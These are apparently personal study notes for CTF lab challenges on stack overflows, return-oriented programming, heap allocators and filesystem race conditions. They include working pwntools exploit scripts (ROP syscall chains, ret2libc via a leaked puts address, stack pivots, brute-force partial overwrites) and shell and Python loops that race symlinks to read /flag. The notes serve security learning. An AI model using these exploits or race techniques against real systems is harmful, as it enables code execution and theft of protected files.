   ...: with pwn.process("/challenge/babymem_level15.0") as target: 
   ...:     with pwn.remote("localhost", 1337) as remote: 
   ...:         remote.writeafter(b"Payload size:", b"100\n") 
   ...:         remote.writeafter(b"Send your payload", b"test") 
   ...:         pwn.info(remote.clean().decode()) 
   ...:                                                                                                                                                       
[x] Starting local process '/challenge/babymem_level15.0'
[+] Starting local process '/challenge/babymem_level15.0': pid 7046
[x] Opening connection to localhost on port 1337
[x] Opening connection to localhost on port 1337: Trying 127.0.0.1
[+] Opening connection to localhost on port 1337: Done
[*]  (up to 100 bytes)!
    You sent 4 bytes!
    Let's see what happened with the stack
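
The byte-by-byte search that fork makes possible can be sketched against a stand-in oracle. Nothing here talks to the real service: make_oracle plays the forking server (a child either survives the overwrite or crashes), and the canary is random test data.

```python
import os


def make_oracle(canary: bytes):
    """Stand-in for the forking server: True if the child survives the guess."""
    def survives(prefix: bytes) -> bool:
        return canary.startswith(prefix)
    return survives


def brute_force_canary(survives) -> bytes:
    known = b"\x00"                      # the canary begins with a null byte
    while len(known) < 8:
        for guess in range(256):
            if survives(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError("no byte value survived")
    return known


secret = b"\x00" + os.urandom(7)
found = brute_force_canary(make_oracle(secret))
print(found.hex())
```

Against the real target, survives would send the padding plus the guessed prefix over a fresh connection and look for the stack-smashing message; that takes at most 7 * 256 connections instead of 2^56 guesses.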

module A-rop

ROP

rp++, ROPgadget.
- rp++ --unique -r2 -f /bin/bash | grep -P "(add|sub|mov) rax, r.."
store addresses into registers
stack pivot: moving the stack elsewhere.
data transfer.
USE INFO IN THE STACK OR REGISTERS.

Counter-CFI(Control Flow Integrity) techniques:

B(lock)OP: ROP on a block (or multi-block) level by carefully compensating for side-effects.
J(ump)OP: instead of returns, use indirect jumps to control execution flow
C(all)OP: instead of returns, use indirect calls to control execution flow
S(ignreturn)ROP: instead of returns, use the sigreturn system call
D(ata)OP: instead of hijacking control flow, carefully overwrite the program’s data to puppet it

Intel Edition(endbr64 after ret instruction) is still bypassable by some advanced ROP techniques (Block Oriented Programming, SROP, etc), but it will significantly complicate exploitation.

Hacking blind:

The standard blind attack requires a forking service. It goes like this:
Break ASLR and the canary byte-by-byte. Now we can redirect memory semi-controllably.
Redirect memory until we have a survival signal (i.e., an address that doesn’t crash).
Use the survival signal to find non-crashing ROP gadgets.
Find functionality to produce output.
Leak the program.
Hack it.

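The so-called libc.so.6 is really just a symbolic link. To swap in a different libc you can temporarily repoint the symlink, but ld and libc must match. Alternatively, patch the binary with patchelf (link here). (This is where glibc_all_in_one gets used.) (I use other people's tools all day; I would really like to write one myself.)

YouTube video 42 shows a newer way of doing ROP… pwntools even has ROP built in. Impressive.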

level1

None of the major protections are enabled; simply overwrite the return address.

level2

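No real protections. I looked up how lseek is used; the main point is that the win function is split into two stages, each reading half of the flag.

Placing two return addresses on the stack is enough. Simple.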
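
A minimal sketch of such a two-address payload, using only `struct`. The padding length and both addresses are made-up placeholders, not values from the challenge binary.

```python
import struct

def build_chain(padding_len, return_addresses):
    """Padding up to the saved return address, then one 8-byte
    little-endian address per function to visit, in order."""
    payload = b"A" * padding_len
    for addr in return_addresses:
        payload += struct.pack("<Q", addr)
    return payload

# Hypothetical values for illustration only.
PADDING = 0x40 + 8        # assumed buffer size plus saved rbp
WIN_STAGE_1 = 0x401234    # assumed address of the first stage
WIN_STAGE_2 = 0x4012F0    # assumed address of the second stage

payload = build_chain(PADDING, [WIN_STAGE_1, WIN_STAGE_2])
print(len(payload), payload[-16:].hex())
```

When the first stage executes its own ret, rsp already points at the second address, so the stages run back to back.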

level3

Five stages; each stage must be called with an argument equal to its stage number. Simple, skipping the details.

level4

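There is an entire function whose only purpose is to provide gadgets.

These gadgets are enough to perform a chmod system call (or execve).

rdi holds the address of the '/flag' string, which is stored on the stack. Because the stack keeps being consumed, the string goes into challenge's stack frame.

Well, the stack address changes from run to run. My oversight; there is a variable at the bottom of the stack frame.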

from pwn import *
binary = './babyrop_level4.1.elf64'
context.binary = binary
context.log_level = 'debug'
p=process(binary)
p.recvuntil(b' at: 0x')
buf = int(p.recv(12), 16)
rbp = buf + 0x50
log.info(hex(rbp))
sc = '''
init-pwndbg
si
b *challenge+86
'''
#gdb.attach(p, gdbscript=sc)
pl = flat([b'/flag\x00'+b'b'*(0x50-6), 0, 0x4015fb, buf, 0x40161b, 4, 0x40160c, 90, 0x4015e3])
p.sendline(pl)
p.interactive()

level5

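Same as the previous level, but the location of buf is no longer given.

I suddenly remembered that babyjail used openat. Maybe I can use fchmodat.

I came up with an odd method. Searching in IDA turned up the byte sequence '\x66\x00', which is the string f\0.
First create a symlink with ln -s /flag /home/hacker/f, then generate input with Python,
and finally run the binary from the command line as /challenge/babyrop_level5.1 <input 6<. (6<. opens the current directory as fd 6, which serves as the dirfd argument), and that does it.
Other strings might work too, such as function names.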

from pwn import *
binary = './babyrop_level4.1.elf64'
context.binary = binary
context.log_level = 'debug'
# load the four arguments one after another, then the syscall number into rax.
pl = flat([b'b'*0x20, 0, 0x401d7b, 6, 0x401d63, 0x403EC8, 0x401d5c, 4, 0x401d54, 0, 0x401d74, 268, 0x401d8b])
open('./input', 'wb').write(pl)

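I only came up with this because I did not know how to leak a stack address; the next few levels will probably wreck me…

~~Looking at old CTFs, maybe the write function could print stack contents; there must be a pointer into the stack somewhere, such as main's rbp.~~ Never mind: the buffer address passed to write also has to be a pointer into the stack, so it is a chicken-and-egg problem. No new method for now.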

level6

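This time there is no syscall gadget, only a ready-made function force_import, and a few gadgets are gone. Still simple. Protections are unchanged.

Add to that the register values at the end of challenge:

So only rdi and rsi need changing. (Is calling open with extra arguments actually a problem???)

But rsi serves as both open's oflag and sendfile's in_fd. Normally open would return fd 3, so oflag would have to be 3, which clearly cannot work because the flag bits would conflict. So occupy fd 3 with another file, and open returns 4 instead. An oflag of 4 is interpreted as read-only.
Next is rdi: open's argument is the address of a string ('e', a null-terminated string at 0x400457), and the same value is reused as sendfile's out_fd. Since an fd is an int and the binary runs at a fixed low address, this would mean opening an output file on fd 4195415 (0x400457) from the command line.

Then I found that bash would not open an fd above 9. fds are allocated by the operating system, so how does bash control them? Why does it only offer 0-9?

If one pass through the function is too hard, run it twice.

First pass: open('e', 4), send('f', 4, 0, 0x7f……); the sendfile fails.
Second pass: jump straight to sendfile(1, 3, 0, 60). open clobbers rdi, rsi and others, so if execution started from the function entry, the register values set up by ROP would be lost.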

from pwn import *
binary = './babyrop_level4.1.elf64'
context.binary = binary
context.log_level = 'debug'
pl = flat([b'b'*(0x50+0x8), 0x401b6a, 0x400458, 0x401b82, 4, 0x401B3F])
pl+= flat([0x401b6a, 1, 0x401b82, 3, 0x401b7a, 0, 0x401b72, 60, 0x401B56, 0])
open('./input', 'wb').write(pl)

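I could only feed input inside gdb with ASLR enabled; the reason is unknown.
Some things about open that I figured out:
- The access mode lives in the lowest 2 bits of the 4-byte oflag and is distinguished by value rather than by individual bits. The mode argument is only used when a new file is created and can usually be ignored.
- The open function in libc ultimately calls openat, so it accepts both absolute and relative paths.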
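
The access-mode observation can be checked with the constants Python exposes in `os`. This is a small sketch assuming Linux flag values; the helper name `access_mode` is made up for illustration.

```python
import os

def access_mode(oflag):
    """Name the access mode encoded in the low two bits of an open() flag value."""
    names = {
        os.O_RDONLY: "O_RDONLY",
        os.O_WRONLY: "O_WRONLY",
        os.O_RDWR: "O_RDWR",
    }
    # O_ACCMODE masks out everything except the access-mode bits.
    return names.get(oflag & os.O_ACCMODE, "nonstandard")

for value in (0, 1, 2, 3, 4):
    print(value, access_mode(value))
```

With these values, an oflag of 4 masks down to 0 and reads as O_RDONLY, while 3 matches none of the three standard modes, which is consistent with the fd 3 versus fd 4 reasoning above.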

level7

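The address of system is handed to me directly.

It worked locally: I looked up the offset between system and the /bin/sh string and wrote the script directly. Remotely, though, I can neither attach nor strace, and the exploit fails even though the offset should be the same. Am I expected to use a different method?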

from pwn import *
binary = './babyrop_level7.1.elf64'
context.binary = binary
context.log_level = 'info'
#p = process('ltrace '+binary, shell=True)
p = process(binary)
p.recvuntil(b'is: 0x')
sys_addr = int(p.recv(12), 16)
log.info(hex(sys_addr))
binsh = sys_addr+0x13f112
sc = '''
b *challenge+0x63
'''
#gdb.attach(p, gdbscript=sc)
pl = flat([b'b'*(0x30+0x8), 0x401af3, binsh, sys_addr])
p.sendline(pl)
p.sendline(b'cat /flag')
p.recvall()

level8

Worked locally; did not bother trying remotely.

from pwn import *
binary = './babyrop_level8.1.elf64'
context.binary = binary
context.log_level = 'debug'
p = process(binary)
elf = ELF(binary)
#libc = ELF('./libc-2.31.so')  # find the matching libc file through the process maps.
libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.33.so')  # libc file for local testing.
pl = flat([b'b'*(0x80+8), 0x401b33, elf.got['puts'], elf.plt['puts'], elf.sym['challenge']])
sc = '''
b *challenge+0x39
'''
#gdb.attach(p, gdbscript=sc)
p.sendline(pl)
p.recvuntil(b'ving!\n')
puts = int.from_bytes(p.recv(6), byteorder='little')
base = puts - libc.sym['puts']
sys = base + libc.sym['system']
binsh = base + next(libc.search(b'/bin/sh'))
pl = flat([b'b'*(0x80+8), 0x401b33, binsh, sys])
p.sendline(pl)

p.interactive()
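
The address arithmetic in the script above, isolated as a sketch without pwntools. All offsets here are invented placeholders; real ones come from the matching libc (for example via `libc.sym[...]` as in the script).

```python
def parse_leak(raw):
    """puts() stops at the first null byte, so a userspace pointer
    typically arrives as 6 bytes; zero-extend it to a 64-bit integer."""
    return int.from_bytes(raw[:6], "little")

def rebase(leaked_addr, leaked_offset, wanted_offsets):
    """Derive the libc base from one leaked symbol and resolve the others."""
    base = leaked_addr - leaked_offset
    if base & 0xFFF:
        raise ValueError("base is not page-aligned: wrong libc or bad leak")
    resolved = {name: base + off for name, off in wanted_offsets.items()}
    resolved["base"] = base
    return resolved

# Hypothetical offsets and base, for illustration only.
PUTS_OFFSET = 0x80000
OFFSETS = {"system": 0x50000, "str_bin_sh": 0x1A0000}
fake_base = 0x7F1234500000
raw_leak = (fake_base + PUTS_OFFSET).to_bytes(8, "little")[:6]

addrs = rebase(parse_leak(raw_leak), PUTS_OFFSET, OFFSETS)
print({name: hex(value) for name, value in addrs.items()})
```

The page-alignment check is a cheap sanity test: if the computed base does not end in 000, the local libc probably differs from the one the target uses.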

level9

stack pivot!!!!

Done this before.

pop_rbp, bss_s^[1], challenge || leave_ret, 0(useless rbp), pop_rdi^[2] || got[puts], plt[puts]^[3], pop_rdi || str_binsh, system.
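
To make the `leave; ret` step of that chain concrete, here is a toy simulation of what the two instructions do to rsp, rbp, and rip. The memory layout and addresses are hypothetical; only the instruction semantics are standard.

```python
def leave_ret(memory, rbp):
    """Apply `leave; ret` on a toy machine.

    leave = mov rsp, rbp ; pop rbp
    ret   = pop rip
    `memory` maps 8-byte-aligned addresses to 64-bit values.
    Returns (rip, rsp, rbp) after both instructions.
    """
    rsp = rbp
    new_rbp = memory[rsp]   # pop rbp
    rsp += 8
    rip = memory[rsp]       # pop rip
    rsp += 8
    return rip, rsp, new_rbp

# Hypothetical fake stack placed in writable memory (e.g. .bss).
FAKE_STACK = 0x404800
POP_RDI = 0x401111          # assumed gadget address
GOT_PUTS = 0x404018         # assumed GOT slot

memory = {
    FAKE_STACK: 0,              # value popped into rbp (unused)
    FAKE_STACK + 8: POP_RDI,    # first gadget of the pivoted chain
    FAKE_STACK + 16: GOT_PUTS,  # argument consumed by pop rdi
}

rip, rsp, rbp = leave_ret(memory, rbp=FAKE_STACK)
print(hex(rip), hex(rsp), hex(rbp))
```

After the pivot, rsp points into the fake stack, so every following ret keeps consuming attacker-written entries from there.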

level10

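PIE is enabled, and win is placed at a random address allocated with mmap, with only read and execute permissions, so the main usable gadgets are still the ones in libc_csu_init. With ASLR on, the stack location is unknown as well.

~~Because the gadgets are in the rodata section, ROPgadget cannot analyze them, so use the rop command in pwndbg to analyze the region after mmap+mprotect.~~
~~Note that only the last 3 hex digits are useful.~~ The rodata section holds the win function, which is copied into high address space via mmap+memcpy.

ROPgadget does not analyze a section that is not executable anyway.

This level, however, gives the location of buf directly.

The mmap'd region always sits just above the ld shared library and has no relation to the stack. However, the return value of mmap in challenge is stored on the stack, in the 8 bytes just above buf.
A stack pivot is needed so that this pointer is used as the return address, which jumps straight to win.

Because of ASLR, the partially overwritten address has to commit to one fixed value. Take that value from a gdb session with ASLR enabled, then keep retrying until the fourth hex digit of a new run happens to equal the chosen one.

This time the lucky number is 0xd57000. Every address seen in IDA must have this offset added.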

from pwn import *
binary = './babyrop_level10.1.elf64'
context.binary = binary
context.log_level = 'debug'
while(True):
    p = process(binary)
    sc = '''
    b *challenge+0x109
    '''
    #gdb.attach(p, gdbscript=sc)
    p.recvuntil(b'located at: 0x')
    buf = int(p.recv(12), 16)
    pl = flat([b'b'*(0x88), buf-16, b'\x3b\x87'])

    p.send(pl)
    all = p.recvall()
    if b'flag' in all:
        break
    else: 
        p.kill()

Running it remotely always has some problem, and it cannot be debugged there. Not bothering.

level11

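Same as the previous level, except that the main logic of challenge() is padded with a huge number of nops before and after. What is that for?

There really is no difference. Adjust the offsets and it passes.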

level12

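Protections unchanged. So what is different this time?? The .0 binary even provides the address of win, which is a freebie.

It suddenly stopped working. I used gdb's record to hunt for the problem; it seems the save and restore commands only work within the current execution.
With ROPgadget's --only option, every instruction you want in the gadget has to be listed; it is not merely an OR filter.
find /tmp -atime +5 -exec rm -rf {} + is better left unused.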
egrep '(pop (rbp|rsp))|leave' -a libc233.gadget ==
ROPgadget --binary /lib/x86_64-linux-gnu/libc-2.33.so --only 'pop|ret'

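It turns out this level is about ROPing from libc, because main returns into libc.so at a high address. Usable gadgets can be searched for directly in the libc file. ~~leave is not strictly required; pop rsp works just as well.~~ It does not work after all. Stick with leave.

In 2.33: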

#0x000000000004e250 : leave ; ret
0x000000000002798b : pop rsp ; ret  
0x0000000000027e3f : pop rsp ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret
0x0000000000027c27 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret

In 2.31:
0x00000000000578f8 : leave ; ret
0x00000000000c7ad3 : leave ; ret 0xfff6
Offset of main's return address from the libc base: 0x270b3

# this is the return address of main
pwndbg> vmmap 0x7efef009a7ed
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    0x7efef0099000     0x7efef01e1000 r-xp   148000 26000  /usr/lib/x86_64-linux-gnu/libc-2.33.so +0x17ed
    
# its offset from the start of libc is `0x277ed`:
pwndbg> distance 0x7f6b0c0fb000 0x7f6b0c1227ed
	0x7f6b0c0fb000->0x7f6b0c1227ed is 0x277ed bytes (0x4efd words)

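Ugh, that is a 1 in 16*16*16 chance, which is rather low, but I cannot think of anything better, so go with it. 0x254000+0x4e250=0x2A2250

~~Then I noticed the address seems unrelated to libc and sits right next to ld.so…~~ That direction was wrong.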
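
The odds quoted for these partial overwrites follow from how many overwritten bits ASLR randomizes. A small sketch of that arithmetic, assuming 4 KiB pages so the low 12 bits of any address are fixed; the function names are made up.

```python
import math

PAGE_BITS = 12  # low 12 bits are the page offset and are not randomized

def unknown_bits(overwritten_bytes):
    """Bits of the overwritten region that ASLR randomizes."""
    return max(0, overwritten_bytes * 8 - PAGE_BITS)

def success_probability(overwritten_bytes):
    """Chance that one fixed guess matches the randomized bits."""
    return 1 / (2 ** unknown_bits(overwritten_bytes))

def attempts_for_confidence(probability, confidence=0.5):
    """Independent attempts needed to succeed at least once with the given confidence."""
    return math.ceil(math.log(1 - confidence) / math.log(1 - probability))

print(success_probability(2))   # 2-byte overwrite: one random hex digit
print(success_probability(3))   # 3-byte overwrite: three random hex digits
print(attempts_for_confidence(success_probability(3)))
```

A 2-byte overwrite (as in level10) leaves one hex digit to chance, while the 3-byte overwrite here leaves three, which is where 16*16*16 comes from.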

exp:

from pwn import *
binary = './babyrop_level12.1.elf64'
context.binary = binary
context.log_level = 'info'
while(True):
    p = process(binary)
    sc = '''
    b *main+0x19f
    init-pwndbg
    lm
    '''
    #gdb.attach(p, gdbscript=sc)
    p.recvuntil(b'located at: 0x')
    buf = int(p.recv(12), 16)
    pl = flat([b'b'*(0x48), buf-16, b'\x50\x22\x2a'])

    p.send(pl)
    all = p.recvall()
    if b'flag' in all:
        print(all)
        break
    else:
        p.kill()

level13

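Let's see what trick this level pulls.

All protections on; the location of buf is given, and the 8 bytes at any one address can be leaked.

??? So just leak the canary, then change the return address to… the same as the previous level. ret2libc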

level14

socket

module B-heap

key:

Dynamic Allocators:
- General Purpose: Doug Lea (pictured) releases dlmalloc into public domain in 1987.
- Linux: ptmalloc (Posix Thread aware fork of dlmalloc)
- FreeBSD: jemalloc (also used in Firefox, Android)
- Windows: Segment Heap, NT Heap
- Kernel allocators: kmalloc (Linux kernel memory allocator), kalloc (iOS kernel memory allocator)
managed by the brk and sbrk system calls:
- sbrk(NULL) returns the end of the data segment
- sbrk(delta) expands the end of the data segment by delta bytes
- brk(addr) expands the end of the data segment to addr

Ubuntu 20.04 is still at the stage outlined in bold in the figure, owing to the introduction of tcache. This module does not go deep into that cache, though.

tcache:
- a caching layer for “small” allocations (<1032 bytes on amd64)
- makes a singly-linked-list using the first word of the free chunk
- very few security checks
setvbuf: scanf and printf call malloc internally for buffering; calling setvbuf on stdin/stdout with a NULL buffer disables that (and avoids confusion during heap exploitation).
ptmalloc caches (for review):
- 64 singly-linked tcache bins for allocations of size 16 to 1032 (functionally “covers” fastbins and smallbins)
- 10 singly-linked “fast” bins for allocations of size up to 160 bytes
- 1 doubly-linked “unsorted” bin to quickly stash free()d chunks that don’t fit into tcache or fastbins
- 64 doubly-linked “small” bins for allocations up to 512 bytes
- doubly-linked “large” bins (anything over 512 bytes) that contain different-sized chunks
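
As a rough check of the "64 tcache bins up to 1032 bytes" figure, the sketch below maps a request size to a tcache bin index. The constants are assumptions for 64-bit glibc defaults (8-byte size field, 16-byte alignment, 32-byte minimum chunk); the function names mirror glibc macros but this is not glibc code.

```python
SIZE_SZ = 8            # assumed: size of the chunk size field on amd64
MALLOC_ALIGNMENT = 16  # assumed: chunk alignment on amd64
MINSIZE = 32           # assumed: smallest possible chunk
TCACHE_MAX_BINS = 64

def request2size(request):
    """Chunk size that backs a malloc(request) call."""
    padded = request + SIZE_SZ + MALLOC_ALIGNMENT - 1
    return max(MINSIZE, padded & ~(MALLOC_ALIGNMENT - 1))

def tcache_index(request):
    """tcache bin index for a request, or None when the chunk is too large."""
    index = (request2size(request) - MINSIZE) // MALLOC_ALIGNMENT
    return index if index < TCACHE_MAX_BINS else None

for request in (1, 24, 25, 1032, 1033):
    print(request, hex(request2size(request)), tcache_index(request))
```

Under these assumptions a 1032-byte request lands in the last bin (index 63) and 1033 bytes falls outside tcache, matching the limit quoted in the list.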
The Unlink Attack, Poison Null Byte
further reading.

malloc internals

the rise of houses

module C-race

key points

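Between the moment a program opens and writes a file and the moment it executes that file, the process may be scheduled out. If the file is rewritten during that gap, a race condition arises.
The shorter this window, the less likely the race is to be hit.
There is a nice system call, matching the nice command, and also ionice; it means literally what it says: run a program with modified scheduling priority.
Resolving a very long path slows the program down and so widens the race window. Symlinks can be used to loop back through several long paths under the same root directory for the same effect.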

Mitigations
1. Safer programming practices (O_NOFOLLOW, mkstemp(), etc).
2. Symlink protections in /tmp
  a. root cannot follow symlinks in /tmp that are owned by other users
  b. specifically made to prevent these sorts of issues
To compile against library functions that are not in libc, pass the corresponding link flags to gcc.
pthread:
- pthread_t | pthread_create() | pthread_join():waits for the thread specified by thread to terminate.
- Under the hood it uses the clone() system call.
discrepancies between libc call and raw syscall:
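- setuid() in libc sets the uid for all threads of the process, while the raw syscall only sets it for the calling thread.
- exit() in libc calls exit_group() and so terminates all threads, while the raw exit syscall only terminates the calling thread.
In practice, global variables are often used to control thread execution.
Reads and writes to memory can produce race conditions too.
Data races: an increment is really a multi-step instruction sequence. Locking solves this.
Detect: valgrind, academic research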
signals and reentrancy:
- use signal to interrupt normal execution control flow.
- use signal function to reenter function.
- DO NOT call non-reentrant functions in your signal handlers.
  - Your handler might have interrupted those functions mid-execution.
  - Another signal might interrupt your signal handler’s non-reentrant invocations mid-execution!
  - Depending on settings (SA_NODEFER flag to sigaction()), another iteration of the same signal might interrupt your signal!
- man signal-safety to see all reentrant libc functions.
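
The data-race note above (an increment is several steps, and a lock fixes it) can be tried out with a short sketch. Whether the unlocked run actually loses updates depends on the interpreter and scheduling, so only the locked total is predictable; `run_counter` is a made-up helper.

```python
import threading

def run_counter(n_threads, increments, use_lock):
    """Increment one shared counter from several threads and return the total."""
    counter = 0
    lock = threading.Lock()

    def worker():
        nonlocal counter
        for _ in range(increments):
            if use_lock:
                with lock:      # read-modify-write happens as one critical section
                    counter += 1
            else:
                counter += 1    # load, add, store: another thread may interleave

    threads = [threading.Thread(target=worker) for _ in range(n_threads)]
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    return counter

locked_total = run_counter(4, 20000, use_lock=True)
unlocked_total = run_counter(4, 20000, use_lock=False)
print(locked_total, unlocked_total)
```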

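YouTube video 50 is the babyrace video. I am stuck on level5 and plan to watch it.

Addendum:

The problem with the level5 shell script is that rm and mv each have a startup cost and a pile of system calls, and the shell runs them through fork+exec, so it is slow and can end up in the situation shown in the left figure. Splitting the commands across several loops is still too slow. Written in C, it would be the ideal state shown in the right figure:
Python is indeed slow to start, but once it is running it is about as fast as C at the system call level, so looping inside Python achieves the same effect. That reminds me: the Dirty COW race condition PoC I read a few days ago was written in C.
- In Python this means heavy use of the os module for system calls; worth studying properly. (Practicing shell was not wasted either.)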

prepare

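First, a script that creates a super long path. Learned some shell programming along the way.

No wonder the video only goes up to t_end: every component on such a path is really a symlink, so the maximum is 20 (each x_end/root pair costs two symlink traversals, and Linux follows at most 40 per lookup).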

#!/bin/bash
prefix='a'
ln -s $(pwd) ./root
for i in {97..116}	# or simply use {a..t}
do
    prefix=$(printf "\\x$(printf %x $i)")
    pushd .
    mkdir $prefix
    cd $prefix
    for j in {1..25}
    do
        mkdir ./$j
        cd ./$j
    done
    innerwd=$(pwd)
    popd
    cp -a ./root $innerwd
    ln -s $innerwd $(pwd)/${prefix}_end
done

Generate the path string (if the path already contains other symlinks, use a few fewer):

#!/bin/bash
prefix='a'
path='./' 
for i in {97..116} 	# or simply use {a..t}
do
    prefix=$(printf "\\x$(printf %x $i)")
    path+=${prefix}_end/root/

done
ls $path	#test path(though must be true...)
#result is:
./a_end/root/b_end/root/c_end/root/d_end/root/e_end/root/f_end/root/g_end/root/h_end/root/i_end/root/j_end/root/k_end/root/l_end/root/m_end/root/n_end/root/o_end/root/p_end/root/q_end/root/r_end/root/s_end/root/t_end/root/
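
For comparison, the same path string can be produced in Python, which is handy if the racing loop is also written there. A minimal sketch; `build_long_path` is a made-up helper and the default of 20 links matches the script above.

```python
import string

def build_long_path(n_links=20, prefix="./"):
    """Join `<letter>_end/root/` for the first n_links lowercase letters."""
    parts = [f"{letter}_end/root/" for letter in string.ascii_lowercase[:n_links]]
    return prefix + "".join(parts)

long_path = build_long_path()
print(long_path)
```

Passing a smaller `n_links` is the easy way to stay under the symlink limit when the path already contains other links.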

level1

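The program stops and waits for me right before it opens the file named by its first argument. At that point I can swap in a symlink to the flag under that name, which bypasses both the check that the name must not contain 'flag' and the check that it must not be a symlink.

Supplementary shell script for the .1 binary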

#!/bin/bash
rm aa bb cc 2>/dev/null
touch aa
ln -s /flag ./cc
# starts out as a regular file, then gets swapped for a symlink to /flag
while [ 1 ]
do
    #sleep 0.05 # not sure whether this helps... hopefully. Turns out it does not
    mv bb aa 
    sleep 0.0005
    mv aa bb
    mv cc aa
    sleep 0.0005
    mv aa cc
done

#!/bin/bash
# shell script that keeps running the challenge

path=./a_end/root/b_end/root/c_end/root/d_end/root/e_end/root/f_end/root/g_end/root/h_end/root/i_end/root/j_end/root/k_end/root/l_end/root/m_end/root/n_end/root/o_end/root/p_end/root/q_end/root/r_end/root/s_end/root/

while [[ 1 ]]
do
    res=$(/challenge/babyrace_level1.1 ${path}aa | grep 'pwn')
    if [ $res ]
    then
        printf "\n$res\n\n"
        exit
    fi
done

Delete a pile of directories:

`rm -r !(peda|*sh)`

Success rate comparison

After switching to a short path, I compared the success rates:

Comparison shell script:

#!/bin/bash
# shell script that keeps running the challenge

path=./a_end/root/b_end/root/c_end/root/d_end/root/e_end/root/f_end/root/g_end/root/h_end/root/i_end/root/j_end/root/k_end/root/l_end/root/m_end/root/n_end/root/o_end/root/p_end/root/q_end/root/r_end/root/s_end/root/
path_2=./a_end/root/b_end/root/c_end/root/d_end/root/e_end/root/f_end/root/g_end/root/h_end/root/i_end/root/j_end/root/k_end/root/l_end/root/m_end/root/n_end/root/o_end/root/p_end/root/q_end/root/r_end/root/s_end/root/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/../../home/hacker/
rate=0
rates=0
ratess=0
for i in {1..1000}
do
    res=$(/challenge/babyrace_level1.1 ${path}aa | grep 'pwn')
    if [ $res ]
    then
        ((rate++))
    fi

    res=$(/challenge/babyrace_level1.1 ${path_2}aa | grep 'pwn')
    if [ $res ]
    then
        ((ratess++))
    fi

    res=$(/challenge/babyrace_level1.1 ./aa | grep 'pwn')
    if [ $res ]
    then
        ((rates++))
    fi
done
echo longpath: $rate/1000
echo path_2: $ratess/1000
echo shortpath: $rates/1000

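Results:

Without sleep:

With sleep (0.05s):

Many factors are involved, but skipping sleep looks more effective. I saw no benefit from the long path, though…

New finding: the first sleep in the race-triggering shell script looked pointless, so I tried removing it, and the success rate shot up:

The long path still does little, though. Without sleep 0.0005, the success rate drops straight to 5/1000.

It fluctuates with the sleep duration, and 0.0005 is still the best. At 0.005, path_2 had the highest success rate. All of it is mysterious behavior; I will not bother trying nice…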

level2

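Exactly the same.

level3

On top of the previous two levels, the file size is checked to be at most 256 bytes, and right after buf[256] sits v7, which controls entry into win(). Swapping the file name gets around this easily.

Watched the office hours and used Python's os module. I tried os.fork, separating unlink and symlink, and using strace to time the program's system calls and analyze the window (which is fairly small). Nothing gave a better result.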

level4

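Use the method above to swap the opened file, overflow the stack, and overwrite the return address to jump to win().

No protections enabled; loaded at a fixed address.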

level5

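Some of my thought process…

It takes an absolute path. Besides a few checks (symlink, argname), the directory containing the file must be owned by root, with no write permission for other users.

???? But after looking at the implementation of dirname, it turns out an absolute path is not actually required.

In that case, ~~the argument will be e (a 0-size file) under /home/hacker,~~

dirname() is purely a string operation that cuts off the leading part of the path. So a bare relative name cannot be used as the argument, otherwise dirname returns the current directory (.), which gives no way around the directory check, and the working directory cannot be changed to anything other than hacker's.

Stage one only checks that the file exists and is not a symlink (lstat, which does not follow links). Stage two checks the directory (dirname() strips argv[1], then stat, which follows links). Stage three actually opens the file.

First touch a file /home/hacker/aa/bb, which passes the name and symlink checks.
Then ln /home/hacker/aa -> /home; it does not matter that bb is not actually in /home.
Finally ln /home/hacker/aa/bb -> /flag

There may be a better way:

Start by creating ./1/aa/bb (plain file), ./2/aa -> /home, and ./3/aa/bb -> /flag
Then create a symlink called dir.
Point it first at ./1, then at ./2, and finally at ./3.
Each step is then just unlink dir followed by symlink to the corresponding numbered directory.
The full path is /home/hacker/dir/aa/bb
This runs so fast that it outpaces the race window, so add a sleep of roughly 0.0001s.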

shell

Wrote a script to avoid retyping commands; once I had thought it through, it passed on the first try.

#!/bin/bash

if [ $1 == 'init' ]
then
    cd
    mkdir a
    cd a
    touch b
elif [ $1 == 2 ]
then
    cd
    mv a b
    ln -s /home /home/hacker/a
elif [ $1 == 3 ]
then
    cd
    rm a ./b/b
    mv b a
    ln -s /flag /home/hacker/a/b
elif [ $1 == 'cls' ]
then
    rm -r a b 2>/dev/null
else
    echo 'invalid argument'
fi

Whoa, I thought this did not look much like a race condition: .0 is only a teaching version, and .1 no longer has the getchar() call.

Redoing it.

#!/bin/bash

rm aa bb cc -rf 2>/dev/null
mkdir aa
touch ./aa/bb
ln -s /home /home/hacker/cc
ln -s /flag /home/hacker/aa/cc
#sleep 0.0005
while [ 1 ]
do
    sleep 0.0005
    mv aa bb	#change dir name
    mv cc aa	#let aa->/home
    sleep 0.0005
    
    mv aa cc #now cc -> /home, bb is directory
    mv bb aa #restore aa(dir)
    mv ./aa/bb ./aa/dd
    mv ./aa/cc ./aa/bb #now ./aa has bb->/flag, dd plainfile
    sleep 0.0005
    
    #restore context, for non-symlink check
    mv ./aa/bb ./aa/cc
    mv ./aa/dd ./aa/bb
done

#!/bin/bash
# shell script that keeps running the challenge

while [[ 1 ]]
do
    res=$(/challenge/babyrace_level5.1 /home/hacker/aa/bb | grep 'pwn')
    if [ $res ]
    then
        printf "\n$res\n\n"
        exit
    fi
done

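Cannot get it to pass, argh…

The Python way + key point addendum

unlink: delete a name from the filesystem. Quite the all-in-one system call: it can remove files, symlinks, sockets, FIFOs, and devices.
Constants are accessed as os.CONSTANT.
Python's builtin open makes unnecessary calls such as fstat and ioctl. os.open calls the low-level function directly.

Python version, following the video: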

import os,sys,time
from os import symlink, unlink
if len(sys.argv) > 1:
    if sys.argv[1] == 'rm':
        os.system('rm -r $(ls | egrep -v "*py")')
        exit()
    elif sys.argv[1] == 'init' :
        os.system('rm -r $(ls | egrep -v "*py")')
        os.system('./initpy')
        exit()

while True:
    time.sleep(0.0001)
    #now dir -> 1, need to be unlinked
    unlink('./dir')
    symlink('./2', './dir')

    #now change dir to 3
    unlink('./dir')
    symlink('./3', './dir')
    time.sleep(0.00003)
    
    #now restore context
    unlink('./dir')
    symlink('./1', './dir')

initpy:

#!/bin/bash
mkdir -p ./1/aa
touch ./1/aa/bb

mkdir -p ./2
